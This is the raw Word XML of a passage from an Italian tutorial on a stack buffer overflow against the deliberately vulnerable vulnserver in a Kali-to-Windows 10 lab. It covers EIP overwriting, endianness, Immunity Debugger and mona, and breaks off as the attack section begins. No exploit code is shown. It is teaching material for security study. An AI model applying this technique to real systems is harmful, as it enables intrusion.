          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B09DC" w:rsidRPr="002C4137">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>È</w:t>
      </w:r>
      <w:r w:rsidR="002C4137" w:rsidRPr="002C4137">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> il registro che con</w:t>
      </w:r>
      <w:r w:rsidR="002C4137">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>tiene l’indirizzo della prossima istruzione da eseguire nel programma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57290DC6" w14:textId="5D0246C9" w:rsidR="005302B2" w:rsidRDefault="009B09DC" w:rsidP="005302B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo stack, per l’appunto, cresce verso il basso, quindi, in caso di buffer overflow, si potrebbe sovrascrivere il registro EBP, ma anche l’EIP, molto importante perché punta all’indirizzo di ritorno, ovvero in cui andare subito dopo! </w:t>
      </w:r>
      <w:r w:rsidR="000C781D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>È</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui che l’attacco diventa pericoloso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B6A2D" w14:textId="77777777" w:rsidR="005302B2" w:rsidRPr="003441B6" w:rsidRDefault="000C781D" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc76047759"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conservazione dati in memoria</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="245F7B78" w14:textId="2D33630B" w:rsidR="000C781D" w:rsidRPr="005302B2" w:rsidRDefault="005302B2" w:rsidP="005302B2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>In informatica, l’ordine con cui vengono memorizzati i byte è importante. Infatti, esistono delle metodologie differenti, a seconda dei processori usati. Essi sono:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1A9AC1" w14:textId="77777777" w:rsidR="005302B2" w:rsidRPr="005302B2" w:rsidRDefault="005302B2" w:rsidP="005302B2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005302B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Little-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005302B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>endian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>memorizzazione/trasmissione che inizia dal byte meno significativo (estremità più piccola) per finire col più significativo, è utilizzata dai processori </w:t>
      </w:r>
      <w:r w:rsidRPr="005302B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Intel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A542CD" w14:textId="785A93AC" w:rsidR="005302B2" w:rsidRPr="005302B2" w:rsidRDefault="005302B2" w:rsidP="005302B2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005302B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Big-endian</w:t>
      </w:r>
      <w:r w:rsidRPr="005302B2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005302B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>memorizzazione/trasmissione che inizia dal byte più significativo (estremità più grande) per finire col meno significativo, è utilizzata dai processori</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Motorola;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E024FF" w14:textId="0B9BB58B" w:rsidR="005302B2" w:rsidRPr="005302B2" w:rsidRDefault="005302B2" w:rsidP="005302B2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Nel nostro caso, avremo a che fare con una metodologia </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>little-endian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Per esempio, il valore esadecimale 0x0123 verrà conservato così:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3543CB6B" w14:textId="5D1ECB83" w:rsidR="005302B2" w:rsidRDefault="005302B2" w:rsidP="005302B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="202122"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32D296CC" wp14:editId="53EFED2B">
            <wp:extent cx="3566469" cy="108975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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3566469" cy="1089754"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313B4A5" w14:textId="6315C41E" w:rsidR="005302B2" w:rsidRPr="003441B6" w:rsidRDefault="005302B2" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc76047760"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00FA1BA6" w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Preparazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2B1EF160" w14:textId="61EFEF73" w:rsidR="000C781D" w:rsidRPr="003441B6" w:rsidRDefault="00FA1BA6" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc76047761"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Macchina virtuale</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4CC1F953" w14:textId="549EB1B0" w:rsidR="00FA1BA6" w:rsidRDefault="00FA1BA6" w:rsidP="00FA1BA6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Il nostro attaccante verrà raffigurato da una macchina virtuale con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>distro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux (2021.2) lanciata su ciò che sarà la vittima, ovvero una macchina reale con sistema operativo Windows 10. La macchina virtuale è connessa con una “Scheda con bridge” (dalle impostazioni di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">), quindi le verrà affidata un indirizzo IPv4 casuale dal DHCP del tipo 192.168.1.X. </w:t>
      </w:r>
      <w:r w:rsidR="001919B1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Per il resto, le configurazioni impostate sono diretta conseguenza dell’immagine OVA già pronta, messa a disposizione nel </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="kali-virtual-machines" w:history="1">
        <w:r w:rsidR="001919B1" w:rsidRPr="001919B1">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>sito ufficiale</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001919B1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E2937" w14:textId="7F1D575E" w:rsidR="001919B1" w:rsidRPr="003441B6" w:rsidRDefault="001919B1" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc76047762"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Software vulnerabile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="5742FA77" w14:textId="03371499" w:rsidR="00441769" w:rsidRDefault="001919B1" w:rsidP="001919B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Come già accennato, faremo uso di un software appositamente vulnerabile, per la precisione si tratta di un server scritto in C. Il software in questione è </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="001919B1">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>vulnserver</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Si tratta di un server in ascolto</w:t>
      </w:r>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulla porta 9999, avviato sulla macchina vittima (Windows 10) con il quale ci collegheremo dal terminale di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> e potremo mandare delle stringhe con i comandi messi a disposizione dal server stesso. Esso sarà la nostra porta di accesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D41B4" w14:textId="1C7F3BFD" w:rsidR="00441769" w:rsidRPr="003441B6" w:rsidRDefault="00441769" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc76047763"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="582D2077" w14:textId="435C79FA" w:rsidR="00441769" w:rsidRDefault="00441769" w:rsidP="00441769">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante la demo si farà uso di uno strumento molto importante, </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00441769">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>Immunity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00441769">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve"> Debugger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00092635">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>È</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> un software di debugging che ci consentirà di tenere traccia del nostro Stack e dei relativi registri, sapendo così cosa stiamo sovrascrivendo man mano che proseguiamo con l’attacco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74533ED8" w14:textId="4A362024" w:rsidR="00441769" w:rsidRPr="003441B6" w:rsidRDefault="00441769" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc76047764"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mona </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="197BE6F0" w14:textId="5AAB2FA1" w:rsidR="00E377FF" w:rsidRDefault="00AF62C8" w:rsidP="00441769">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00441769" w:rsidRPr="00441769">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>Mona</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> è un modulo scritto in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> che ci consente di vedere i file di cui fa uso il nostro server e ispeziona le sue difese a livello di memoria. Una volta trovato il file giusto potremmo usarlo per il nostro attacco. Questo modulo deve essere lanciato dalla console di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00441769">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debugger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F2CA5" w14:textId="77777777" w:rsidR="00E377FF" w:rsidRDefault="00E377FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5AA484" w14:textId="0A457CA9" w:rsidR="00E377FF" w:rsidRPr="003441B6" w:rsidRDefault="00E377FF" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc76047765"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Attacco</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3869606D" w14:textId="525B324E" w:rsidR="00E377FF" w:rsidRPr="003441B6" w:rsidRDefault="00937CAE" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc76047766"/>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.1</w:t>
      </w:r>
      <w:r w:rsidR="00E377FF" w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003441B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="12B93E0D" w14:textId="346ED3B4" w:rsidR="00937CAE" w:rsidRDefault="00937CAE" w:rsidP="00937CAE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Come prima operazione dobbiamo assicurarci una connessione stabile con il server da attaccare. Quindi, apriremo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>vulnserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulla macchina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, il quale ci dirà che è in attesa di connessioni, e un terminale sulla macchina virtuale. Per testare la connessione useremo il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
